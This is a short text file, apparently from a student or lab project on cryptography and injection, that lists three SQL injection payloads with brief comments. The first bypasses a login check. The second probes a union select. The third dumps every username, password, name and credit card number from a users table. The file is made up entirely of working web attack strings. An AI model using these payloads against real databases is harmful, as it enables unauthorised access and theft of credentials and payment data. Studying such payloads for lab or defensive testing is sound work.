Newer
Older
crypto-and-injection-project / injections.txt
// basic injection
' or 1=1;--

// can we exfil data?
' union select 'WOOHOO'; --

// get entire users table
' union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name; --